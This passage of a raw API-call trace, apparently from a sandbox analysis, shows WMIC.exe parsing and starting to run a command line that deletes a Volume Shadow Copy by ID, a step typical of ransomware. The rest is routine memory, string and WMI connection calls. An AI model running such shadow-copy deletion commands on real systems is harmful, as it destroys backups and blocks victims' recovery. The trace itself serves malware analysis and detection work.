lpData=0x16f4f0, lpcbData=0x16f490*=0x400 | out: lpType=0x0, lpData=0x16f4f0*=0x36, lpcbData=0x16f490*=0xc) returned 0x0 [0093.341] _wtol (_String="65536") returned 65536 [0093.341] free (_Block=0x4a6eb0) [0093.341] RegCloseKey (hKey=0x0) returned 0x6 [0093.341] CoCreateInstance (in: rclsid=0xff267410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff2673f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x16f998 | out: ppv=0x16f998*=0x23471d0) returned 0x0 [0093.380] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x23471d0, xmlSource=0x16fae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x4a6e50), isSuccessful=0x16fb50 | out: isSuccessful=0x16fb50*=0xffff) returned 0x0 [0093.496] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x23471d0, DOMElement=0x16f990 | out: DOMElement=0x16f990) returned 0x0 [0093.496] malloc (_Size=0x18) returned 0x4a6e50 [0093.496] free (_Block=0x4a6e50) [0093.496] malloc (_Size=0x18) returned 0x4a6e50 [0093.497] free (_Block=0x4a6e50) [0093.497] malloc (_Size=0x18) returned 0x4a6e50 [0093.497] malloc (_Size=0x18) returned 0x4a6e70 [0093.497] malloc (_Size=0x30) returned 0x4a8080 [0093.497] malloc (_Size=0x18) returned 0x4a6eb0 [0093.497] free (_Block=0x4a6eb0) [0093.497] malloc (_Size=0x18) returned 0x4ac560 [0093.498] malloc (_Size=0x18) returned 0x4ac580 [0093.498] SysStringLen (param_1="VALUE") returned 0x5 [0093.498] SysStringLen (param_1="TABLE") returned 0x5 [0093.498] SysStringLen (param_1="TABLE") returned 0x5 [0093.498] SysStringLen (param_1="VALUE") returned 0x5 [0093.498] malloc (_Size=0x30) returned 0x4a80c0 [0093.498] malloc (_Size=0x18) returned 0x4ac5a0 [0093.498] free (_Block=0x4ac5a0) [0093.498] malloc (_Size=0x18) returned 0x4ac5a0 [0093.498] malloc (_Size=0x18) returned 0x4ac5c0 [0093.498] SysStringLen (param_1="LIST") returned 0x4 [0093.498] SysStringLen (param_1="TABLE") returned 0x5 [0093.498] malloc (_Size=0x30) returned 0x4a8100 [0093.499] malloc (_Size=0x18) returned 0x4ac5e0 [0093.499] free (_Block=0x4ac5e0) [0093.499] malloc (_Size=0x18) returned 0x4ac5e0 [0093.499] malloc (_Size=0x18) returned 0x4ac600 [0093.499] SysStringLen (param_1="RAWXML") returned 0x6 [0093.499] SysStringLen (param_1="TABLE") returned 0x5 [0093.499] SysStringLen (param_1="RAWXML") returned 0x6 [0093.499] SysStringLen (param_1="LIST") returned 0x4 [0093.499] SysStringLen (param_1="LIST") returned 0x4 [0093.499] SysStringLen (param_1="RAWXML") returned 0x6 [0093.499] malloc (_Size=0x30) returned 0x4a8140 [0093.500] malloc (_Size=0x18) returned 0x4ac620 [0093.500] free (_Block=0x4ac620) [0093.500] malloc (_Size=0x18) returned 0x4ac620 [0093.500] malloc (_Size=0x18) returned 0x4ac640 [0093.500] SysStringLen (param_1="HTABLE") returned 0x6 [0093.500] SysStringLen (param_1="TABLE") returned 0x5 [0093.500] SysStringLen (param_1="HTABLE") returned 0x6 [0093.500] SysStringLen (param_1="LIST") returned 0x4 [0093.500] malloc (_Size=0x30) returned 0x4a8180 [0093.500] malloc (_Size=0x18) returned 0x4ac660 [0093.500] free (_Block=0x4ac660) [0093.500] malloc (_Size=0x18) returned 0x4ac660 [0093.501] malloc (_Size=0x18) returned 0x4ac680 [0093.501] SysStringLen (param_1="HFORM") returned 0x5 [0093.501] SysStringLen (param_1="TABLE") returned 0x5 [0093.501] SysStringLen (param_1="HFORM") returned 0x5 [0093.501] SysStringLen (param_1="LIST") returned 0x4 [0093.501] SysStringLen (param_1="HFORM") returned 0x5 [0093.501] SysStringLen (param_1="HTABLE") returned 0x6 [0093.501] malloc (_Size=0x30) returned 0x4a81c0 [0093.501] malloc (_Size=0x18) returned 0x4ac6a0 [0093.501] free (_Block=0x4ac6a0) [0093.501] malloc (_Size=0x18) returned 0x4ac6a0 [0093.501] malloc (_Size=0x18) returned 0x4ac6c0 [0093.501] SysStringLen (param_1="XML") returned 0x3 [0093.501] SysStringLen (param_1="TABLE") returned 0x5 [0093.501] SysStringLen (param_1="XML") returned 0x3 [0093.502] SysStringLen (param_1="VALUE") returned 0x5 [0093.502] SysStringLen (param_1="VALUE") returned 0x5 [0093.502] SysStringLen (param_1="XML") returned 0x3 [0093.502] malloc (_Size=0x30) returned 0x4a8200 [0093.502] malloc (_Size=0x18) returned 0x4ac6e0 [0093.502] free (_Block=0x4ac6e0) [0093.502] malloc (_Size=0x18) returned 0x4ac6e0 [0093.502] malloc (_Size=0x18) returned 0x4ac700 [0093.502] SysStringLen (param_1="MOF") returned 0x3 [0093.502] SysStringLen (param_1="TABLE") returned 0x5 [0093.502] SysStringLen (param_1="MOF") returned 0x3 [0093.502] SysStringLen (param_1="LIST") returned 0x4 [0093.502] SysStringLen (param_1="MOF") returned 0x3 [0093.502] SysStringLen (param_1="RAWXML") returned 0x6 [0093.503] SysStringLen (param_1="LIST") returned 0x4 [0093.503] SysStringLen (param_1="MOF") returned 0x3 [0093.503] malloc (_Size=0x30) returned 0x4a8240 [0093.503] malloc (_Size=0x18) returned 0x4ac720 [0093.503] free (_Block=0x4ac720) [0093.503] malloc (_Size=0x18) returned 0x4ac720 [0093.503] malloc (_Size=0x18) returned 0x4ac740 [0093.503] SysStringLen (param_1="CSV") returned 0x3 [0093.503] SysStringLen (param_1="TABLE") returned 0x5 [0093.503] SysStringLen (param_1="CSV") returned 0x3 [0093.503] SysStringLen (param_1="LIST") returned 0x4 [0093.503] SysStringLen (param_1="CSV") returned 0x3 [0093.503] SysStringLen (param_1="HTABLE") returned 0x6 [0093.503] SysStringLen (param_1="CSV") returned 0x3 [0093.503] SysStringLen (param_1="HFORM") returned 0x5 [0093.503] malloc (_Size=0x30) returned 0x4a8280 [0093.504] malloc (_Size=0x18) returned 0x4ac760 [0093.504] free (_Block=0x4ac760) [0093.504] malloc (_Size=0x18) returned 0x4ac760 [0093.504] malloc (_Size=0x18) returned 0x4ac780 [0093.504] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0093.504] SysStringLen (param_1="TABLE") returned 0x5 [0093.504] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0093.504] SysStringLen (param_1="VALUE") returned 0x5 [0093.504] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0093.504] SysStringLen (param_1="XML") returned 0x3 [0093.504] SysStringLen (param_1="XML") returned 0x3 [0093.504] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0093.504] malloc (_Size=0x30) returned 0x4a82c0 [0093.505] malloc (_Size=0x18) returned 0x4ac7a0 [0093.505] free (_Block=0x4ac7a0) [0093.505] malloc (_Size=0x18) returned 0x4ac7a0 [0093.505] malloc (_Size=0x18) returned 0x4ac7c0 [0093.505] SysStringLen (param_1="texttablewsys") returned 0xd [0093.505] SysStringLen (param_1="TABLE") returned 0x5 [0093.505] SysStringLen (param_1="texttablewsys") returned 0xd [0093.505] SysStringLen (param_1="XML") returned 0x3 [0093.505] SysStringLen (param_1="texttablewsys") returned 0xd [0093.505] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0093.505] SysStringLen (param_1="XML") returned 0x3 [0093.505] SysStringLen (param_1="texttablewsys") returned 0xd [0093.505] malloc (_Size=0x30) returned 0x4a8300 [0093.505] malloc (_Size=0x18) returned 0x4ac7e0 [0093.506] free (_Block=0x4ac7e0) [0093.506] malloc (_Size=0x18) returned 0x4ac7e0 [0093.506] malloc (_Size=0x18) returned 0x4ac800 [0093.506] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0093.506] SysStringLen (param_1="TABLE") returned 0x5 [0093.506] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0093.506] SysStringLen (param_1="XML") returned 0x3 [0093.506] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0093.506] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0093.506] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0093.506] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0093.506] malloc (_Size=0x30) returned 0x4a8340 [0093.524] malloc (_Size=0x18) returned 0x4ac820 [0093.524] free (_Block=0x4ac820) [0093.524] malloc (_Size=0x18) returned 0x4ac820 [0093.524] malloc (_Size=0x18) returned 0x4ac840 [0093.524] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0093.524] SysStringLen (param_1="TABLE") returned 0x5 [0093.525] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0093.525] SysStringLen (param_1="XML") returned 0x3 [0093.525] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0093.525] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0093.525] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0093.525] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0093.525] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0093.525] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0093.525] malloc (_Size=0x30) returned 0x4a8380 [0093.525] malloc (_Size=0x18) returned 0x4ac860 [0093.526] free (_Block=0x4ac860) [0093.526] malloc (_Size=0x18) returned 0x4ac860 [0093.526] malloc (_Size=0x18) returned 0x4ac880 [0093.526] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0093.526] SysStringLen (param_1="TABLE") returned 0x5 [0093.526] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0093.526] SysStringLen (param_1="XML") returned 0x3 [0093.526] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0093.526] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0093.526] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0093.526] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0093.526] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0093.526] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0093.527] malloc (_Size=0x30) returned 0x4a83c0 [0093.527] malloc (_Size=0x18) returned 0x4ac8a0 [0093.527] free (_Block=0x4ac8a0) [0093.527] malloc (_Size=0x18) returned 0x4ac8a0 [0093.527] malloc (_Size=0x18) returned 0x4ac8c0 [0093.528] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0093.528] SysStringLen (param_1="TABLE") returned 0x5 [0093.528] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0093.528] SysStringLen (param_1="XML") returned 0x3 [0093.528] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0093.528] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0093.528] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0093.528] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0093.528] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0093.528] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0093.528] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0093.528] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0093.528] malloc (_Size=0x30) returned 0x4a8400 [0093.529] malloc (_Size=0x18) returned 0x4ac8e0 [0093.529] free (_Block=0x4ac8e0) [0093.529] malloc (_Size=0x18) returned 0x4ac8e0 [0093.529] malloc (_Size=0x18) returned 0x4ac900 [0093.529] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0093.529] SysStringLen (param_1="TABLE") returned 0x5 [0093.529] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0093.529] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0093.529] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0093.529] SysStringLen (param_1="XML") returned 0x3 [0093.529] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0093.529] SysStringLen (param_1="texttablewsys") returned 0xd [0093.529] SysStringLen (param_1="XML") returned 0x3 [0093.529] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0093.529] malloc (_Size=0x30) returned 0x4a8440 [0093.530] malloc (_Size=0x18) returned 0x4ac920 [0093.530] free (_Block=0x4ac920) [0093.530] malloc (_Size=0x18) returned 0x4ac920 [0093.530] malloc (_Size=0x18) returned 0x4ac940 [0093.530] SysStringLen (param_1="htable-sortby") returned 0xd [0093.530] SysStringLen (param_1="TABLE") returned 0x5 [0093.530] SysStringLen (param_1="htable-sortby") returned 0xd [0093.530] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0093.530] SysStringLen (param_1="htable-sortby") returned 0xd [0093.530] SysStringLen (param_1="XML") returned 0x3 [0093.530] SysStringLen (param_1="htable-sortby") returned 0xd [0093.530] SysStringLen (param_1="texttablewsys") returned 0xd [0093.530] SysStringLen (param_1="htable-sortby") returned 0xd [0093.530] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0093.530] SysStringLen (param_1="XML") returned 0x3 [0093.530] SysStringLen (param_1="htable-sortby") returned 0xd [0093.530] malloc (_Size=0x30) returned 0x4a8480 [0093.531] malloc (_Size=0x18) returned 0x4ac960 [0093.531] free (_Block=0x4ac960) [0093.531] malloc (_Size=0x18) returned 0x4ac960 [0093.531] malloc (_Size=0x18) returned 0x4ac980 [0093.532] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0093.532] SysStringLen (param_1="TABLE") returned 0x5 [0093.532] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0093.532] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0093.532] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0093.532] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0093.532] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0093.532] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0093.532] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0093.532] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0093.532] malloc (_Size=0x30) returned 0x4a84c0 [0093.533] malloc (_Size=0x18) returned 0x4ac9a0 [0093.533] free (_Block=0x4ac9a0) [0093.533] malloc (_Size=0x18) returned 0x4ac9a0 [0093.533] malloc (_Size=0x18) returned 0x4ac9c0 [0093.533] SysStringLen (param_1="wmiclimofformat") returned 0xf [0093.534] SysStringLen (param_1="TABLE") returned 0x5 [0093.534] SysStringLen (param_1="wmiclimofformat") returned 0xf [0093.534] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0093.534] SysStringLen (param_1="wmiclimofformat") returned 0xf [0093.534] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0093.534] SysStringLen (param_1="wmiclimofformat") returned 0xf [0093.534] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0093.534] SysStringLen (param_1="wmiclimofformat") returned 0xf [0093.534] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0093.534] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0093.534] SysStringLen (param_1="wmiclimofformat") returned 0xf [0093.534] malloc (_Size=0x30) returned 0x4a8500 [0093.535] malloc (_Size=0x18) returned 0x4ac9e0 [0093.535] free (_Block=0x4ac9e0) [0093.535] malloc (_Size=0x18) returned 0x4ac9e0 [0093.535] malloc (_Size=0x18) returned 0x4aca00 [0093.535] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0093.535] SysStringLen (param_1="TABLE") returned 0x5 [0093.535] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0093.536] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0093.536] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0093.536] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0093.536] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0093.536] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0093.536] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0093.536] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0093.536] malloc (_Size=0x30) returned 0x4a8540 [0093.536] malloc (_Size=0x18) returned 0x4aca20 [0093.536] free (_Block=0x4aca20) [0093.537] malloc (_Size=0x18) returned 0x4aca20 [0093.537] malloc (_Size=0x18) returned 0x4aca40 [0093.537] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0093.537] SysStringLen (param_1="TABLE") returned 0x5 [0093.537] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0093.537] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0093.537] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0093.537] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0093.537] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0093.537] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0093.537] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0093.537] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0093.537] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0093.537] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0093.538] malloc (_Size=0x30) returned 0x4a8580 [0093.538] FreeThreadedDOMDocument:IUnknown:Release (This=0x23471d0) returned 0x0 [0093.538] free (_Block=0x4a6e90) [0093.538] GetCommandLineW () returned="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\" delete" [0093.538] malloc (_Size=0xe0) returned 0x4acd30 [0093.538] memcpy_s (in: _Destination=0x4acd30, _DestinationSize=0xde, _Source=0x1f25be, _SourceSize=0xd0 | out: _Destination=0x4acd30) returned 0x0 [0093.539] malloc (_Size=0x18) returned 0x4aca60 [0093.539] malloc (_Size=0x18) returned 0x4aca80 [0093.539] malloc (_Size=0x18) returned 0x4acaa0 [0093.539] malloc (_Size=0x18) returned 0x4acac0 [0093.539] malloc (_Size=0x80) returned 0x4a6e90 [0093.539] GetLocalTime (in: lpSystemTime=0x16fb30 | out: lpSystemTime=0x16fb30*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x8, wMinute=0x36, wSecond=0x3a, wMilliseconds=0xa1)) [0093.539] _vsnwprintf (in: _Buffer=0x4a6e90, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x16fa88 | out: _Buffer="09-04-2020T08:54:58") returned 19 [0093.539] lstrlenW (lpString=" shadowcopy where \"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\" delete") returned 71 [0093.539] malloc (_Size=0x90) returned 0x4a70a0 [0093.539] lstrlenW (lpString=" shadowcopy where \"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\" delete") returned 71 [0093.539] lstrlenW (lpString=" shadowcopy where \"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\" delete") returned 71 [0093.539] malloc (_Size=0x90) returned 0x4ace20 [0093.539] lstrlenW (lpString=" shadowcopy where \"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\" delete") returned 71 [0093.539] lstrlenW (lpString=" shadowcopy where \"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\" delete") returned 71 [0093.539] lstrlenW (lpString=" shadowcopy where \"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\" delete") returned 71 [0093.539] malloc (_Size=0x16) returned 0x4acae0 [0093.539] lstrlenW (lpString="shadowcopy") returned 10 [0093.539] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0093.539] malloc (_Size=0x16) returned 0x4acb00 [0093.539] malloc (_Size=0x8) returned 0x4a7140 [0093.539] free (_Block=0x0) [0093.539] free (_Block=0x4acae0) [0093.540] lstrlenW (lpString=" shadowcopy where \"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\" delete") returned 71 [0093.540] malloc (_Size=0xc) returned 0x4acae0 [0093.540] lstrlenW (lpString="where") returned 5 [0093.540] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0093.540] malloc (_Size=0xc) returned 0x4acb20 [0093.540] malloc (_Size=0x10) returned 0x4acb40 [0093.540] memmove_s (in: _Destination=0x4acb40, _DestinationSize=0x8, _Source=0x4a7140, _SourceSize=0x8 | out: _Destination=0x4acb40) returned 0x0 [0093.540] free (_Block=0x4a7140) [0093.540] free (_Block=0x0) [0093.540] free (_Block=0x4acae0) [0093.540] lstrlenW (lpString=" shadowcopy where \"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\" delete") returned 71 [0093.540] malloc (_Size=0x5c) returned 0x4acec0 [0093.540] lstrlenW (lpString="\"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\"") returned 45 [0093.540] _wcsicmp (_String1="\"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\"", _String2="\"NULL\"") returned -5 [0093.540] lstrlenW (lpString="\"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\"") returned 45 [0093.540] lstrlenW (lpString="\"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\"") returned 45 [0093.540] malloc (_Size=0x5c) returned 0x4acf30 [0093.540] malloc (_Size=0x18) returned 0x4acae0 [0093.540] memmove_s (in: _Destination=0x4acae0, _DestinationSize=0x10, _Source=0x4acb40, _SourceSize=0x10 | out: _Destination=0x4acae0) returned 0x0 [0093.540] free (_Block=0x4acb40) [0093.540] free (_Block=0x0) [0093.540] free (_Block=0x4acec0) [0093.540] lstrlenW (lpString=" shadowcopy where \"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\" delete") returned 71 [0093.540] malloc (_Size=0xe) returned 0x4acb40 [0093.540] lstrlenW (lpString="delete") returned 6 [0093.540] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0093.540] malloc (_Size=0xe) returned 0x4acb60 [0093.540] malloc (_Size=0x20) returned 0x4acec0 [0093.540] memmove_s (in: _Destination=0x4acec0, _DestinationSize=0x18, _Source=0x4acae0, _SourceSize=0x18 | out: _Destination=0x4acec0) returned 0x0 [0093.540] free (_Block=0x4acae0) [0093.541] free (_Block=0x0) [0093.541] free (_Block=0x4acb40) [0093.541] malloc (_Size=0x20) returned 0x4acef0 [0093.541] lstrlenW (lpString="QUIT") returned 4 [0093.541] lstrlenW (lpString="shadowcopy") returned 10 [0093.541] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0093.541] lstrlenW (lpString="EXIT") returned 4 [0093.541] lstrlenW (lpString="shadowcopy") returned 10 [0093.541] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0093.541] free (_Block=0x4acef0) [0093.541] WbemLocator:IUnknown:AddRef (This=0x1e41390) returned 0x2 [0093.541] malloc (_Size=0x20) returned 0x4acef0 [0093.541] lstrlenW (lpString="/") returned 1 [0093.541] lstrlenW (lpString="shadowcopy") returned 10 [0093.541] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0093.541] lstrlenW (lpString="-") returned 1 [0093.541] lstrlenW (lpString="shadowcopy") returned 10 [0093.541] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0093.541] lstrlenW (lpString="CLASS") returned 5 [0093.541] lstrlenW (lpString="shadowcopy") returned 10 [0093.541] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0093.541] lstrlenW (lpString="PATH") returned 4 [0093.541] lstrlenW (lpString="shadowcopy") returned 10 [0093.541] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0093.541] lstrlenW (lpString="CONTEXT") returned 7 [0093.542] lstrlenW (lpString="shadowcopy") returned 10 [0093.542] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0093.542] lstrlenW (lpString="shadowcopy") returned 10 [0093.542] malloc (_Size=0x16) returned 0x4acb40 [0093.542] lstrlenW (lpString="shadowcopy") returned 10 [0093.542] GetCurrentThreadId () returned 0x9dc [0093.542] ??0CHString@@QEAA@XZ () returned 0x16f940 [0093.542] malloc (_Size=0x18) returned 0x4acae0 [0093.542] malloc (_Size=0x18) returned 0x4acb80 [0093.542] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e41390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff2d2998 | out: ppNamespace=0xff2d2998*=0x1e53a98) returned 0x0 [0093.562] free (_Block=0x4acb80) [0093.562] free (_Block=0x4acae0) [0093.562] CoSetProxyBlanket (pProxy=0x1e53a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0093.562] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0093.562] GetCurrentThreadId () returned 0x9dc [0093.562] ??0CHString@@QEAA@XZ () returned 0x16f7d8 [0093.562] malloc (_Size=0x18) returned 0x4acae0 [0093.562] malloc (_Size=0x18) returned 0x4acb80 [0093.562] malloc (_Size=0x18) returned 0x4acba0 [0093.563] malloc (_Size=0x18) returned 0x4acbc0 [0093.563] SysStringLen (param_1="root\\cli") returned 0x8 [0093.563] SysStringLen (param_1="\\") returned 0x1 [0093.563] malloc (_Size=0x18) returned 0x4acbe0 [0093.563] SysStringLen (param_1="root\\cli\\") returned 0x9 [0093.563] SysStringLen (param_1="ms_409") returned 0x6 [0093.563] free (_Block=0x4acbc0) [0093.563] free (_Block=0x4acba0) [0093.563] free (_Block=0x4acb80) [0093.563] free (_Block=0x4acae0) [0093.563] malloc (_Size=0x18) returned 0x4acae0 [0093.563] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e41390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff2d29a0 | out: ppNamespace=0xff2d29a0*=0x1e53b28) returned 0x0 [0093.568] free (_Block=0x4acae0) [0093.568] free (_Block=0x4acbe0) [0093.568] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0093.568] GetCurrentThreadId () returned 0x9dc [0093.569] ??0CHString@@QEAA@XZ () returned 0x16f950 [0093.569] malloc (_Size=0x18) returned 0x4acbe0 [0093.569] malloc (_Size=0x18) returned 0x4acae0 [0093.569] malloc (_Size=0x18) returned 0x4acb80 [0093.569] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0093.569] malloc (_Size=0x3a) returned 0x4acfa0 [0093.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff261980, cbMultiByte=-1, lpWideCharStr=0x4acfa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0093.569] free (_Block=0x4acfa0) [0093.569] malloc (_Size=0x18) returned 0x4acba0 [0093.569] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0093.569] SysStringLen (param_1="shadowcopy") returned 0xa [0093.569] malloc (_Size=0x18) returned 0x4acbc0 [0093.569] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0093.569] SysStringLen (param_1="'") returned 0x1 [0093.570] free (_Block=0x4acba0) [0093.570] free (_Block=0x4acb80) [0093.570] free (_Block=0x4acae0) [0093.570] free (_Block=0x4acbe0) [0093.570] IWbemServices:GetObject (in: This=0x1e53a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x16f958*=0x0, ppCallResult=0x0 | out: ppObject=0x16f958*=0x1e604e0, ppCallResult=0x0) returned 0x0 [0093.578] malloc (_Size=0x18) returned 0x4acbe0 [0093.578] IWbemClassObject:Get (in: This=0x1e604e0, wszName="Target", lFlags=0, pVal=0x16f880*(varType=0x0, wReserved1=0xff2d, wReserved2=0x0, wReserved3=0x0, varVal1=0xff2d2998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f880*(varType=0x8, wReserved1=0xff2d, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0093.578] free (_Block=0x4acbe0) [0093.578] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0093.578] malloc (_Size=0x3e) returned 0x4acfa0 [0093.578] lstrlenW (lpString="Select * from 